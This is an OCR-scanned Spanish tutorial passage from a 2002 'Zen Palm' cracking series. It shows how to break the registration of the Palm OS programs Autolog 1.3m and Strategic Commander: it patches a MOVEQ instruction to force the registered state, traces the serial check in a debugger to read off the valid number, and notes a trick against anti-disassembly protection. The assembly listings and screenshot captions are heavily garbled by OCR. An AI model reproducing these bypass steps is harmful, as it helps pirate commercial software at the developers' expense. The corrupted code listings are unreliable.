subido puedes pasar y si no está, pues no puedes XD. En este caso vemos que dO se interesa especialmente por el valor que va a 
tener, si 1 o 0, e incluso al volver a la rutina principal veremos que en 5e80 nos vuelve a testear d0 y que de ello dependerá el 
salto de 5e86, y con ello el caminito a seguir hacia el bad o good boy. 


Entonces, lo que se me ocurre, es cambiar la instrucción para que siempre tenga en d0 un uno. Para eso observamos la línea 
00005dfe 7000 L597 MOVEQ *0,DO 

y la cambiamos por 

00005dfe 7001 L597 MOVEQ +1,D0 


de forma que siempre nos dé d0 con valor uno. Para eso nos vamos a un editor hexadecimal, buscamos la secuencia de bytes (en 
este caso 7000) observando que los que hay antes y después son los de las instrucciones de antes y después de esta sentencia. 
Entonces es cuando ponemos 7001 donde pone 7000. Salimos del debugger, cargamos el nuevo programa parcheado en el 
Emulador, ponemos un fake serial cualquiera y al darle a OK 


Thonk Yow 


o Thenks for purchasis 
. E ¿RutoLog.: ba 


ZN -Preinoa hato y art 
- number a safe place. 


Pues de nada por purchasearte la basura de programa que no nos vale de nada. 
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PROTECCION: Continuando con Autolog 1.3m 


Crear un método elegante para nuestro objetivo. 
Dificultad: )NewBies (X)Intermedio ( )Avanzado ( ) Master ( )Gúru 


SouthDebugger, PRCedit, PilotDis. POSE Palm emulator, 


INTRODUCCION 
Contiando con Autolog 1.3m 


AL ATAQUE 
LECCIÓN 5: ANEXO A LA LECCIÓN 4 (DUDAS RESUELTAS) 


¡¡Hola de nuevo pequeños gamberros!!. Como os medio prometí en la anterior entrega, vamos a proceder 
a aclarar algunas cosas que nos quedaron en el tintero y que nos resultan realmente interesantes en este 
crack. 


Para poneros al día, nos habían quedado por ver tres puntos: 


1- Comprobación del trial. Bueno, al final decidí no prestar demasiada atención a esto por dos motivos. 
El primero, porque con el programa registrado, el trial no me preocupa; y el segundo porque 
prefiero buscar un programa basado sólo en esa protección y mirarlo con más calma. Sin embargo, 
a cambio, os voy a dar una pequeña clase de ASM de Motorola para ir profundizando en 
esto. 
2- Analizar lo del número mágico. Pues la verdad es que no es más que eso, un número mágico. Si 
lo usas, te registra por una sola vez. En cuanto vuelves a iniciar el programa ya no te vale. Podríamos 
hacer un cambio en la comparación, pero teniendo el serial correcto, poco nos importa 
usar el “sucedáneo”. Por lo tanto, creo que es una pérdida de tiempo fijarse más en eso. Como dice 
el título de un LP de los Sex Pistols “Flogging a dead horse” es decir, por mucho que azotes a 
un caballo que ya está muerto, la carrera ya no la ganas. A otra cosa, butterfly. 
3- El keygen. Esto es lo realmente importante. Remitiéndonos al punto uno, vamos a ver cómo el 


programa halla nuestro ID al partir de nuestro HotSync y cómo luego calcula nuestro serial. ¿Os 
hace más ilusión que haya capturas de pantalla?... bueeegeeeeeeno, os meteré alguuuuuuuuuna. 
Aquí vamos a usar una nueva herramienta llamada SouthDebugger, debugger para Palm que os 
viene protegido con una nag. Está hecho en java, así que ya sabéis que hacer si lo que deseáis es 
probar el producto con todas sus posiblilidades ;0). 


NOTA IMPORTANTE: 


Como sé que se me va a olvidar, os apunto algo que llamó poderosamente mi 

atención en una web de Ingeniería Inversa de Palms que ya no existe. Era de un italiano llamado Quequero 

y ponía lo siguiente “Se il listato che vi dissasembla...” ejem, bueno, mejor en español...”Si el listado que 
desensambláis es ilegible o no corresponde, provad a cancelar el primer byte del .prc y reintentar el desensamblado... 
¡debería funcionar!”. Con lo cual me quedé muy contento porque ya sé que hay protecciones 

anti-desensamblador para Palm y que es tan sencillo romperlas como cancelar el primer byte del ejecutable. 
Personalmente no me encontré ningún caso, pero me ha parecido un apunte importante. 


1- Escribo estas líneas desde...: 


Lo que parecía un soleado día de vacaciones en yate poco a poco se convirtió en una pesadilla de tormenta. 
El crack se presentaba risueño y fácil y no considerábamos complicado hallarlo, sin embargo, el keygen 

no salía, las líneas se complicaban... el cielo ennegrecido dio paso a rayos sesgantes y a truenos que sonaban 
como gritos de gigantes condenados. El barco zorzobraba, nuestra moral se hundía, el Zen Palm se 

nos atascaba. Cuando quisimos darnos cuenta, éramos náufragos de nuestro conocimiento. 

Bueno, si mal no recordáis, habíamos dado bastantes vueltas hasta encontrar un punto de ataque correcto 
para nuestro programa. Primero, la llamada a la Alert, luego mirar el HotSync y al final decidimos tirarnos 
de cabeza al momento en que se capturan los strings que introducimos como S/N (para neófitos o newbies, 
esto significa serial number. Para nada significa Sólo Newbies, así que podéis estar tranquilos... :0) ). 

Nos aparecía nuestro nombre, una id y debajo un espacio para poner el número, algo así como esto: 


En donde veis que se calcula un User ID al partir del nombre de conexión HotSync con el que la Palm se 
pone de acuerdo con el Pc. En fin, pues como en el anterior tutorial no acabábamos de ver con qué comparaba 
nuestro fake serial, el pobre X-Grimator, en su torpeza, empezó a pensar que el serial se calculaba al 

leer el HotSync y que se activaba un flag que luego se comparaba con el fake serial (que a su vez acababa 

por convertirse en un flag también, llegando al final a una mera comprobación de flags). Ni por asomo. Al 
final, las cosas son más fáciles para los zombi-programadores. Este razonamiento era erróneo por la sencilla 
razón de que en ningún lado existía la conversión del fake serial a flag. De esto, que era evidente, me di 
cuenta después de un rato trasteando la llamada a HotSync que hace el programa. De todos modos, os 
comento cómo convierte el programa nuestro nombre a User ID y así aprendemos un poco de ASM de 


Motorola como os prometí. 

Lo primero que encontramos al hacer un ATB en “DIkKGetSyncInfo” (en la forma que os expliqué en el 
otro tuto) es esto: (nota: lo que vaya detrás del punto y coma son comentarios que no lee el programa. Os 
he ordenado el código para que leáis los saltos de corrido) 


00005f 78 4e4f a2a9 sysTraplO kGet Syncl nfo ; ll anada a API donde ponenos el ATB en el debugger 
00005f 7c 3600 MOVE. WDO, [3 

00005f 7e 4fef0018 LEA 24(A7), A7; a7+418(h) tiene m FotSync. HB (h) signifi ca hexadeci nal . 
00005f 82 663c BNE L609; no salta 

00005f 84 486eff d6 PEA - 42(A6); a6-2a tiene m HotSync. PEA pushea en la pila al gún buffer. 
0O0005f 88 4e4f a0c7 sysTrapStrLen; calcula la longitud de m HotSync y lo nete en hexa en DO 
OODO5f 8c 4a40 TST. WDO; conpara DO con cero. 

00005f 8e 584f ADDQ W+4, A7; corrige la pila sunándol e 4 bytes 

0O005f 90 672e BEQ L609; no salta ya que DO no es cero (Branch ¡f equal ) 

00005f 92 486eff d6 PEA - 42( A6); A6-2a el HotSync 

OODO5f 96 3f 3c1b5b MOVE. W3*7003! $1b5b, - (A/); field 7003: Nane (usar para ell o PrcEdit) 
00005f 9a 2f0a MDE. L A?, -(A7) 

OODO5f Oc 4ebafaac J SR L563 

00005a4a 4e560000 L563 LINK 26, +0 -- SETFI ELOFRCMBTR (pinta en pantalla el HotSync) 
00005a4e 2f0b MOVE. L A3, - (A7) 

00005250 2f0a MOVE. L A?, - (A7) 

00005252 2f 2e000e MOVE. L 14( 46), - (A7) 

00005a56 4e4f a0c7 sysTrapStrLen 

00005a5a 5240 ADDQ W+fL, DO 

00005a5c 7200 MIVEQ +0, DL 

00005a5e 3200 MOVE. WDO0, DL 

00005260 584f ADDQ W+4, A7 

00005262 2f01 ME. L DI, -(A7) 

00005264 4e4f a0le sysTr apMenttandl eNew 

00005268 2448 MEA L AO, A2 

00005a6a 2f0a MOVE. L A?, - (A7) 

0ODO5a6c 4e4f a021 sysTr apMenttandl elock 

00005270 2648 MEA L AD, A3 

00005a72 2f 2e000e MVE. L 14( 26), - (A7) 

00005376 2f0b MOVE. L A3, - (A7) 

00005a78 4e4f a0c5 sysTrapstr Copy 

00005a7c 2f0a ME. L A?, -(A7) 

00005a7e 4e4f a022 sysTr apMenttandl elnl ock 

00005282 3f 2e000c MOVE. W12(26), - (A7) 

00005286 2f 280008 MOVE. L 8(46), - (A7) 

00005a8a 4e4f a180 sysTr apFr ntst (bj ect! ndex 

00005a8e 5c4f ADDQ W+6, A7 

00005290 3f00 MOVE. WDO, - (A7) 

00005292 2f 280008 MOVE. L 8(46), - (A7) 

00005296 4e4f al83 sysTr apFr ntst Chj ect Ptr 

00005a9a 2648 MOIVEA L AD, A3 

00005a%c 2f0a MOVE. L A?, - (A7) 

00005a%e 2f0b MOVE. L A3, - (A7) 

00005aa0 4e4f al58 sysTraprFl dSet Text Handl e 

00005224 4fef0022 LEA 34(A7), A7 

00005aa8 245f MDVEA L (A7) + A2 

00005aaa 265f MOVEA L (A7) + A3 

OODO5aac 4e5e UN.K A6 

0O00O5aae 4e75 RTS 

00005ab0 93 DC B +A147 


O00005abl 5365744669656c645465 DC. B ' Set Fi el dText Fronítr' 

00005abb 787446726f 60537472 

OODO5f a0 486eff c6 PEA - 58( A6); carga una vari abl e 

O0005f a4 486eff d6 PEA - 42(46); pushea m HotSync 

00005f a8 4ebaf d62 J SR L586 

O0005d0c 4e560000 L586 LINK 26, +0 -- MAPHOTSYNONAMETCPI D (convi erte HotSync en Lserl D 
00005d10 48e71830 MOVEM L LY DY AY/A3, -(A7); al ¡inicio de subruti nas, para recuperar luego los val ores 
00005d14 266e000c MOVEA L 12(26),A3; nueve a A3, Abe 

00005d18 7600 MIVEQ +0, CB; ¡inicia a cero CB y D4 (nove qui ck) 

00005dla 7800 MIEQ +0, DA 

000O5d1c 4227 LR B -(A7); borra un byte de la pila 

00005dle 4878000f PEA $000f. W 

00005d22 2f0b MOVE. L A3, - (A7) 

0000524 4e4f a027 sysTrapMenset; pone un rango de nenoria en un puntero di nánnco a un val or específico 
00005d28 246e0008 MOVEA L 8(46), A2; nete m bbotSync en A2 

00005d2c 4f ef 000a LEA 10(A7), A7 

00005030 6008 BRA L588; salto obli gatori o 

00005d32 1012 L587 MVE. B (A?), DO; mieve la pri nera letra de m HotSync a DO en ascii hexadeci nal 
00005034 4880 EXT. WDO0O; extiende DO en un vord 

00005036 d840 ADO WDO, D4 suna los val ores en ascii de las letras del HotSync que va sacando 
00005d38 528a ALDQ L +4, A?; saca una letra de HotSync 

00005d3a 4al2 L588 TST. B (A2); testea el pri ner byte de m HotSync para ver si es cero 
00005d3c 66f 4 BNE L587; al vaciar el HotSync de A2, finaliza el loop. 

00005d3e 246e0008 MOVEA L 8(46), A2; HotSync pasa a A2 

00005042 7601 MVEOQ +41, PB; ¡nicia [3 a val or uno (ver val ores de bytes, no datos). 
00005044 6044 BRA L593; salto obli gatori o 

00005046 4al2 L589 TST. B (A2); compara el pri ner byte que quede en el HotSync con cero 
00005048 6716 BEQ L590; si es cero, salta 

00005d4a 10la MVE. B (A2)+ DO; el priner byte que tenga A2 lo nete en DO 

00005d4c 4880 EXT. WDO0O; extiende el tanaño de DO 

00005cd4e 48c0 EXT. L DO 

00005d50 81fc0010 O VS. W+A6! $10, DO; di vi de entre 10(h) el vord de DO 

00005054 4840 SVAP DO; ¡rvierte el orden de los bytes (así, 500013 pasa a 130005) 
00005d56 4ledffee LEA - 18(45), AD; carga A5-12, que es “9876543210453721” 

00005d5a 16f 00000 MOVE. B 0(AD, DD. VW, (43) + 

00005d5e 6008 BRA L591; salto obli gatori o 

00005d60 4ledffee L590 LEA - 18(A5), AO; a5-12 es “9876543210453721" 

00005d64. 16f 03000 MOVE. B 0(AD, CB. VW, (43) + 

00005d68 3044 L591 MIVEA WDA, AD; pasa a AD la suna de los valores ascii de m HotSync 
00005d6a 2008 MDVE. L AO, DD; de AD a DO 

00005d6c 81f c000a Ol VS. W+£10! $a, DO; di vi de DO entre A(h) 

00005d70 4840 SVAP DO; ¡nivierte los bytes 

00005d72 06400030 ADO . W+48! $30, DO; añade 30(h) a DO 

00005d76 16c0 MOVE. B DO, (43) + 

00005d78 48c4 EXT. L D4 

00005d7a 89f c000a Ol VS. W+20! $a, DA; di vi de D4 entre Ah) 

00005d7e 0c4:30002 CWPI. W+2, CB; conpara EB con 2 

00005d82 6604 BNE L592; de no ser ¡gual, nos salta 

00005d84. 16f c0020 MVE. B +82! $20, (A3) + 

00005d88 5243 L592 ADDQ WA, 'B; suna 1 a PB 

00005d8a 0c4:30004 1593 CWPI . W+4, 3; conpara [B con 4 

00005d8e 6fb6 BLE L589; acaba el loop cuando [B=5 

00005d90 4cdf Oc18 MOVEM L (A7) + CB/ DY/ AY/ A3 

00005d94 4e5e UNLK A6 

00005d96 4e75 RTS 

00005d98 93 DC B +4147 

00005d99 4d6170486f 745379%6€e63 DC B ' MapHot SyncNeneToP! D 

00005da3 4e616d65546f 504944 


O0005dac 0000 DC. W+0 

OO005f ac 486eff c6 PEA - 58(A6); A6-3A es el núnero cal cul ado al partir del HotSync 
O0005f bO 3f 3c1b61 MOVE. W+?7009! $1b61, - (A7); Field 7009: Lserl D 
00005f b4 2f0a MIDE. L A?, -(A7) 

OODO5f b6 4ebafa92 J SR L563; SETFI ELDIEXTFROM5TR, para pintar el PiDen la pantalla 
OODO5f ba 4fef00lc LEA 28(A7), A7; carga en pila m Lserld 
O0005f be 6012 BRA L610; salto obli gatori o 

00005f cO 486eff d6 L609 PEA - 42( A6) 

O0005f c4 3f 3c1b61 MOVE. W+7009! $1b61, - (A7) 

00005f c8 2f0a ME. L A?, -(A7) 

OODO5f ca 4ebafa7e J SR L563 

OODO5f ce 4fef000a LEA 10(A7), A7 

00005f d2 261f L610 MVE. L (A7) + CB 

00005f d4 245f MDVEA L (A7) + A2 

00005f d6 4e5e UNLK A6 

00005f d8 4e75 RTS 

00006048 3f 3c1b5c MOVE. W+*7004! $1b5c, - (A7); Field 7004: Serial 
0000604c 2f0a ME. L A?, -(A7) 

0000604e 4e4f a180 sysTraprFr ntst Cbj ect! ndex 

00006052 5c4f ADDQ W+6, A7; suna 6 para corregir la pila 
00006054. 3F00 MOVE. WDO, - (A7) 

00006056 2f0a ME. L A%, -(A7) 

00006058 4e4f al79 sysTrapFr nset Focus 

0000605c 4f ef 000a LEA 10(A7), A7 

00006060 2fOa L614 ME. L A?, -(A7) 

00006062 4e4f al93 sysTrapFrnkbk al og; muestra el formol ario en pantalla para introducir ya el serial 
00006066 3200 MOVE. WDO0, Cb 

00006068 Oc451b5d CPI. W+*7005! $1b5d, D5 

0000606c 584f ALDQ W+4, A7 

0000606e 660000f 4 BNE L617 

00006072 2f0b MOVE. L A3, - (A7) 

00006074 2f0a ME. L A?, -(A7) 

00006076 4ebafda2 J SR L599 


Pues después de leer todo esto pasito a pasito desesperadamente, queridos niños, y tras tirarse horas y 
horas traceando con el debugger, el alma cándida de X-Grimator ha descubierto que ¡¡no vale de nada!!, 
no es más que una engañifa, un engañabobos, una trampa para elefantes...¡¡será asqueroso el programador!!... 
nos ha tomado el pelo haciéndonos ver cómo calcula el UserID para luego hallar el número sin 

tener para nada en cuenta todo este proceso. Grrrrrrrrrrr... >:o( 

2- En esta isla hay un mono que es amigo mío y me quita los piojos: 

“Querido diario, tras un naufragio de cinco días entre líneas y líneas de código, me he hecho un amigo 
muy simpático que se llama Amelio. Estoy empezando a perder la razón y apenas me alimento de la leche 
de un coco que he conseguido pelar” (pelar cocos... ya empezamos con expresiones capciosas XD ). 

En fin, como esto no es propiamente un tutorial sino que es un anexo, no quiero extenderme demasiado. 
Hemos visto cómo calcula el UserID al partir de nuestro HotSync, y he aprovechado para comentaros las 
cosas más importantes que se van realizando a fin de que tengáis una idea algo más avanzada sobre ASM 
de Motorola. Ahora, volvemos al grano y sacamos el numerito. Para ello, volvemos al tutorial anterior a la 
subrutina llamada EnteredKey Valid (esta vez dejamos a la virgen en paz que bastante tuvo, je, je...). De 
ahí vamos traceando hasta 


O0005df 4 b6aa0016 CP. L 22(A2), PB 

O0005df 8 6204 BH L597-- CON PASS CORRECTA NO SALTA 
O0005df a 7001 MIVEQ +fl, DO 

OO0O5df c 6002 BRA L598 

O0005df e 7000 L597 MIVEQ +0, DO-- PON ENDO A +1 SE PARCHEA 


donde a estas alturas, a cualquiera de vosotros no se le escapa que lo interesante está en 5df4, por lo que 
tendremos que ver qué comparación hace. Para ello vamos a usar una nueva herramienta, el SouthDebugger. 
Es un programita en java que una vez lanzado nos aparece esto: 


le damos a connect y entramos de lleno en el debugger, donde de forma feliz nos topamos de bruces con 
una pantalla que debería tener activadas las ventanas que veis, y que tenéis en el menú Window. Os recomiendo 
activar las mismas que yo, ya que son muy cómodas: 


como observáis, las ventanas interesantes son Converter (convierte valores hexa en decimal y viceversa), 
step spy, la de registros, la de datos (trap stack) y una de loggin por si queréis loggear paso a paso de lo 
que vais haciendo. En la ventana de registros tengo marcado datos hexa, pero podéis seleccionar decimales. 
La forma de ejecutar es la siguiente: 


donde Go lanza el debugger, Step permite ejecutar una instrucción y Next ejecuta de golpe toda una llamada 
sin entrar en ella. Los breakpoints los elegimos en la ventana de breakpoints tecleando arriba el que 


nos interesa, así: 


Bueno, no dije que para abrir esa ventana debéis pulsar el botón con los tres puntos. Ponemos un atb en 
“FldGetTextPtr”, le damos a Go y aparecemos de este modo tras meter un serial basura en la ventana de 


Palm: 


aquí hay que destacar que la línea siguiente a ejecutar es la que vemos debajo de todo en color azul, y que 
los valores de los registros están en la ventana de registros. ¡Dios, me repito más que el ajo!... le vamos 
dando a F8 para ejecutar paso a paso y a F7 para ejecutar llamadas de golpe y de este modo llegamos a 
nuestra querida línea de comparación: 


A e z_E-_EEEEEEEE EC  ezmmzóÓó 


REG DE O 


A A 


pues bien , si os fijáis, (aparte de que nuestro fake 12345678 está en la ventana de datos trap stack), debajo 
de todo, en azul, pone 

CMP.L +f22!$16(A2)[=631207!$9A1A7],D3 
¿y qué pensáis que es 631207, que en hexa es 9A1A77?... jeje, pues si, eso... y si vemos en la ventana de 
registros, en D3 tenemos el valor hexa de mi fake serial, que es 12345678 (podéis elegir el modo decimal 
para verlo más claro en esa misma ventana de datos). Si el número fake que metemos es de 6 o menos 
dígitos, la comparación se hará justo encima de ésta que estamos viendo, pero se hace sobre igual número. 
Y luego viene el salto BHI que ya comentamos en el anterior tuto y que lee el flag Zero que ya sale activo 
de la aplicación Virginal esa que nos quita el sueño. BHI significa que salta cuando (tanto C como Z) 
estén desactivadas. 
Pues la risa de esto es que usemos el HotSync que usemos ¡¡el numerito nos vale para todos por igual!!. 
Así que llego a la conclusión de que el UserID no es más que basura para despistar. 


3- Camarón que se duerme se lo lleva la corriente: 

Pues así es. Nuestro náufrago será rescatado en breve por una patrulla gracias a que a base de pensar decidió 
investigar por su cuenta en vez quedarse de brazos cruzados, descubriendo que a unos metros había un 
complejo hotelero que organizaba vacaciones en esa isla (juas). 

He de reconocer que me despistó lo del UserID pero todavía sigo preguntándome que fin tiene gastar 

líneas y líneas de código enrevesado para calcular un número que luego ¡¡no vale de nada!!. Hay gente tan 
sul generis por ahí en adelante... (eso de “sui generis” es una expresión de Humanidades, no de Informática, 
pero en algo tenía que valerme mi carrera ¿no?). 

Bueno acabo aquí el anexo al cuarto capítulo de Zen Palm (Diario secreto de X-Grimator), bastante cansado 
ya porque son unas horas de la noche que en fin... 

Confío que esto haya matizado el tuto anterior y pula por fin los flecos que quedaban de este programa. 
Ahora sí que no queda nada de nada que mirar ya. 

Un abrazo muy especial desde aquí a Ziritione, Sunevil, S-P-A-R-K, DDiego y los canales tdisidents y 
fícodex del IRC-Hispano por acogerme como miembro cuando tuve problemas en *crackers. Por supuesto 
no olvido por nada en el mundo a eSn-min, quizá el cracker que más sabe de esta zona (S-P-A-R-K vive 

en otro lado más lejano, pero le va a la zaga...) y el único sensato y de buen corazón. Tendríamos que 
aprender tanto de él. 

Ahora me voy a dormir mucho que ya casi amanece XD. 

X-Grimator, Europa 08/07/02 

“Pensad, pensad, siempre pensad” 

PD: Mis tutos los tenéis en www.disidents.org, sección cracking/documentos, bajo el nombre de Zen Palm 
(Diario Secreto de X-Grimator). 
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INTRODUCCION 
LECCIÓN 6: LABERINTO DE PASIONES 


AL ATAQUE 


Otro día más, uno menos de vida. 

Pues aquí estamos, peleando de nuevo con un crack para nuestro amado sistema operativo PalmOs, 

soportado por procesadores de arquitectura Motorola Dragonball... lo que son las cosas ¿verdad?. Y 

mientras, el gamberro de mi amigo S-P-A-R-K acaba de ser fichado por cierta revista de contenido underground 
sobre Internet para que escriba la sección de crackmes. A él va dedicado especialmente este 

tutorial en honor a uno de los crackers más didácticos, entusiastas y sabios que conozco en la scene hispana. 


1- El objetivo de marras: 

Esta vez el objetivo que hemos reventado es un juego divertidísimo llamado Strategic Commander 

1.0 de la Empresa Zindaware, y que me voy a comprar por lo ameno que es y por el mareo que me 

produjo su protección, que al fin y al cabo hay que saber recompensar las cosas buenas y bien hechas. 
Básicamente el juego en cuestión es uno de conquista y estrategia en el espacio, donde la versión shareware 
tan sólo permite combatir en universos de pocos planetas, mientras que si está registrado nos deja 

utilizar campos de batalla inconmensurables. Uauuuuu.... 


2- Herramientas, las tools of the trade que dicen en tierras de herejes...: 

Esta vez, por no variar, usaremos las siguientes herramientas, que estáis hartos de conocer ya de 
conformidad a los anteriores tutoriales: 

- pre2bin: que nos permite convertir los archivos .pre a binarios con los resources que lo componen. 
- pre Explorer 1.014: aunque nos vale igual que el preEdit 1.0 bl, esta vez usaremos éste por dos 


motivos: el primero, para conocerlo y que veáis que hay muchas herramientas para esto (bueno, 
no muchas en realidad, pero sí variadas); y en segundo lugar porque los Talt, tFORM, tSTR etc... 
nos los muestra en hexadecimal y no en decimal (me refiero, al buscar su identificación) que en 
este crack nos resultará más cómodo. 

- PilotDis: para poder desensamblar sin demasiado estrés. 

- Palm Southdebugger 1.5: sospecho que éste será el debugger que usemos al partir de ahora, ya 
que sus prestaciones y comodidad superan al PalmDebugger que empleamos hasta hoy. Otro 
producto digno de comprar. Mi única pega es que está programado en Java y el Java a mí me cae 
un poco pesado, pero en fin, yo no sabría ni programarlo... :0) así que no me quejo. 


NOTA: 


A día de hoy, Carpathia me ha prometido actualizar su PalmDeMon, ya que hasta ahora 

no pudo por el trabajo que le daba de comer y no le permitia crackear (qué típico ¿verdad?). Esta 

es una gran noticia, no sólo porque parece que ya nadie desarrollaba herramientas para Palm sino 
porque es un pedazo de programa que deja boquiabiertos a todos. Ya me encargaré yo de su traducción 
al español y de betatestearlo. 


3- De cómo el desierto es el mayor laberinto (idea de J.L. Borges): 

(Donde parece no haber nada, resulta que se halla el peor de los enigmas). 

Nuestro encaminar al desierto comenzó con un agradable viaje turístico a Túnez. Sol, bellas mujeres, té aromatizado, 
paisajes de película. 

Embriagados por la belleza de un sueño norteafricano y desafiando el sardónico destino que sonreía al mirarnos, nos 
fuimos adentrando en ese vasto mar de luz y arena, plagado de ínfimos seres que nos observaban sin notarlo nosotros y 
gobernado por genios llamados Djinns, tan temidos por las tribus nómadas de tez oscura por su poder mágico sobre los 
mortales. Quemaba el sol como el recuerdo de aquella mujer que se separó de nuestro lado. Pero el embrujo del 
desierto, ¡maldición!, el tierno embrujo del desierto con su hechizo perezoso de aletargadas tardes de verano, nos hizo 
poco a poco ir separándonos de lo prudente e ir dejándonos caer en lo que vino a llamarse “El Yunque del So]”... la 
maldición bíblica de estar perdidos en nuestro particular Éxodo. Íbamos a aprender lo que era sufrir, conoceríamos una 
deses-peranza que jamás hubiésemos ni imaginado. Y mientras, nuestra mente danzaba en su febril borrachera de 
sentidos, abotargada, soñolienta.... 


Al principio, como es de rigor, nos las prometíamos muy felices. El bueno de X-Grimator, cogió su pre2bin y metiendo 
el igual directorio el ejecutable semdr.pre, con el comando pre2bin semdr.pre logró convertir ese .prc en un montón de 
graciosos archivos de extensión .bin. 


Estupendo. 169 archivos. ¡¡Santo Cristo!! Aquí me temo que va a haber un tomate montado... 

bufff... esto no me da muy buena espina.... Bueno, como lo más importante en el mundo del crack es no ponerse 
nervioso (ya sabéis eso de +0Orc, el Zen-Cracking y el vodka), vamos a centrarnos sólo en los archivos que pone 
code000x.bin, ya que los demás los veremos cómodamente en el programa que os mencioné antes, el PrcExplorer. 
Apartamos esos archivos y los metemos en el mismo directorio que PilotDis. Una vez ahí, tecleamos el comando 
pilotdis code0001.bin y tendremos ese binario desensamblado y listo para estudiar. 

Lo mismo deberíamos hacer con code0002.bin, code0003.bin, code0004.bin y code0005.bin. Uy, uy, uy... 

aquí es donde notamos ya la primera cosa rara, ¿5 códigos? (en realidad 6, pero por el tamaño de code0000. 

bin ya notaréis que difícilmente se puede hacer algo con apenas 24 bytes). ¡Glup! es la primera vez que vemos un 
programa con tanto código desensamblado. Primer síntoma de que algo no marcha. 

Ahora es cuando unos piensan “Bien, ¡esto promete!” y otros “Nada, me dedico al hack y punto”. 

Pero bueno, prometí una protección diferente por cada lección e intento llevar a cabo mi promesa. 

Decidí meter este tuto en el “laboratorio” cracker de X-Gri ya que tenía características que lo hacían propio. 

Y estamos viendo ya la primera... 

Con la frente bien alta y la sangre fría, cogemos nuestros bin desensamblados y ahora con extensión .s (se pueden leer 
con un simple block de notas) y los dejamos apartaditos y preciosos de momento. 

Lo que necesitamos ahora es ver algo, una entrada, un mensaje de error, algo que dé pie a nuestra particular disección, 


así que cargamos el programa en nuestro emulador de Palm tal y como vimos en anteriores entregas y nos encontramos 
esto: 


es decir, la típica ventanita donde lo primero que te recuerdan es que macho, en esta vida SIEMPRE hay 
que pagar por todo. Aishhh, que paciencia hay que teneeeeer... vamos a darle al Register Now! a ver qué 
ocurre: 


Ummm me parece a mí que eso de poner 666 como serial... tengo de dejar de ir tanto por el chat que la 
gente se lo tiene muy creído y contagian... Ok, y si le damos a Register, nos larga un bofetón en la cara 
que pone: 


cosa que no deja de ser curiosa si vemos que al poner como S/N: 123456789, lo que nos aparece es: 


dos mensajes diferentes de error. Eso ya es una pista. En fin, pues vamos al prcExplorer a ver qué pasa 
con esto ¿no?. 

Pues nos metemos de cabeza ahí y al mirar Talt ¡¡horror!! no aparece ninguna Talt con el mensaje 

de error. No, no, no00o, por favor, esto se pone feo... cinco codes, ninguna Talt...¡¡arggg!!, pero calma 
mis pequeños amiguitos, que todo tiene solución en esta vida menos la muerte (y ni siquiera estamos 
seguros del todo de esto último). Si nos fijamos en las Talt, hay una, la 1100 (44c hexa) cuya cabecera 
pone Info ¿cierto? y si os fijáis en el primer mensaje de error... ¿qué pone la cabecera?... apuntaos un 
plátano, qué chicos tan monos... x) 

Bueno y ahora a buscar los errores. Los localizamos en tSTR como 7000 (1b58 hexa) y 7100 

(1bbc hexa) y hasta vemos el de Thank you for registering! como 7200 (1c20 hexa). Ya os podéis secar el 
sudor, sólo fue un susto pasajero. Pues estupendo, minimizamos el preExplorer y volvemos a nuestros 
queridos códigos que habíamos apartado a buscar el mensajito en cuestión. Nos ponemos a buscar con el 
“buscar” que trae el block de notas como opción, y en concreto esto “$1b58” que es el valor hexa de 
nuestro primer mensaje de error, y resulta que lo único que hallamos está en el code0003.bin.s y pone: 


00000378 2f3c1b58044c L33 MOVE.L +t458753100!$1b58044c,-(A7) 


cielos, que es muy distinto a lo que vimos hasta ahora. Pero en vuestra sabia astucia de Zen Palmers (juas) 
observaréis que ese valor hexa se puede descomponer como 


$1b58 y O44c 


es decir, 1b58 para nuestro mensaje de error, y 044c para la Alert 1100 (que era la de cabecera Info). 

¡Ostras que chulada! así que la alerta 1100 se rellena con los tSTR según sea el caso... ummm es interesante 
esto para nuestro conocimiento. Cuando haga un crackme recordadme que meta este pequeño despiste. 
Respecto a los demás code000x.bin.s, no aparece mención alguna a 1b58. 

Os ahorro trabajo: el code0002.bin.s y code0005.bin.s no aluden para nada a 044c, así que de 

momento sólo nos interesan el code uno, tres y cuatro. 

Resumiendo, tenemos un montón de codes y un mensaje de error extraño que se rellena con lo 

que interese. Pocos datos, demasiado desierto... Mohamed ¿por dónde vinimos, por allí o por allí?... empieza 
a apretar demasiado el sol a nuestra cabecita cracker... 


4- Estamos perdidos y la naturaleza no tiene compasión con los mortales: 

Sol y más sol. Empieza a apretar la sed. Dicen que un ser humano aguanta sin agua 20 horas. 

Luego se empieza a hinchar la lengua y los labios. La idea de beber es fija. Eso no es lo peor. Es esa fase 

aún puedes sobrevivir. Lo grave viene cuando empiezas a ver y oír cosas que no existen. Al principio es 

una sombra, una cara que se desvanece, un rumor. Cualquier manual de supervivencia de las tropas legionarias 


francesas del siglo XIX ya avisaba que era el principio del fin. Si no se ingiere un líquido, en apenas 

un par de horas sobreviene la muerte más espeluznante, con calambres, espasmos, convulsiones, labios 
amoratados y una espuma pastosa en la boca. Los humanos mueren balbuceando ininteligibles palabras 
dirigidas a invisibles Djinns que se mofan de ellos, mantienen conversaciones con esos demonios de 

las arenas, llaman a sus madres en una danza de luces y ruidos. Ver a alguien agonizando de sed es uno de 
los espectáculos más escalofriantes a los que puede enfrentarse un ser humano adulto. No se olvida jamás. 
Y mientras, es esa marea de código y avisos de error, nos vamos poco a poco perdiendo sin saber 

qué buscamos, cómo empezamos ni como orientar el crack... 

Como mera ayuda y antes de seguir, apenas señalaros que la ventanita de Register es el FRM 

2600, por si alguien quiere seguir esa vía de ataque. Reconozco que lo primero que me llamó la atención 
fue el doble mensaje de error, que cambiaba según el número de dígitos introducidos (por encima o debajo 
de 6). Luego veremos que estaba encaminado, aunque no exactamente en lo cierto. Mi siguiente paso 

fue poner un breakpoint en StrCompare (compara dos strings) confiando que mi fake se comparase con el 
serial real. Nada, ni paró la ejecución. Todo esto lo hacía sobre el code0001.bin.s y me dio un escalofrío 
pensar que tendría que hacerlo con cada uno de los códigos. Además, también lo intenté con DIkGetSyncInfo 
pero esa SysTrap sólo me liaba más y más. Eso sí, con FrmCustomAlert me aparecía el mensaje de 

bad boy, pero no me resolvía gran cosa. Si no os lo creéis, podéis seguir los pasos que hice yo, ya veréis 
como vais de sección en sección del código sin resolver nada. Por lo que a mí respecta, estaba más que 
perdido. 

Pero tras cada tormenta, como un mimo de un Dios juguetón, viene un rayito de luz y vuelve la 

calma. Zen Palm es lo que necesitamos. Si la montaña no viene a Mahoma, Mahoma irá a la montaña. 
Está claro que el listado muerto no nos vale de gran cosa aquí, ¿cierto?, bueno, pues entonces 

